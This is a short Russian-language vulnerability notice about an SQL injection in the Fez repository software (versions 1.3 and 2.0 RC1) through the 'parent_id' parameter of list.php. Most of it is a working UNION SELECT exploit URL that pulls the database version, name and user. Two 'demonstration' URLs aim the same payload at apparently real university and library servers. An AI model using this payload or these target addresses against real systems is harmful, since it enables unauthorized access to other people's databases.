Программа: Fez 1.3/2.0 RC1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «parent_id» сценарием list.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://site.com/list.php?browse=subject&parent_id=1 UNION SELECT
1,concat_ws(0x3a,version(),database(),user())/*

Демонстрация: 1.3

http://repository.openpolytechnic.ac.nz/list.php?browse=subject&parent_id=1
UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*

Демонстрация: 2.0 RC1

http://avi.lib.cas.cz/sandbox/fex/trunk/list.php?browse=subject&parent_id=1
UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*



Оставить мнение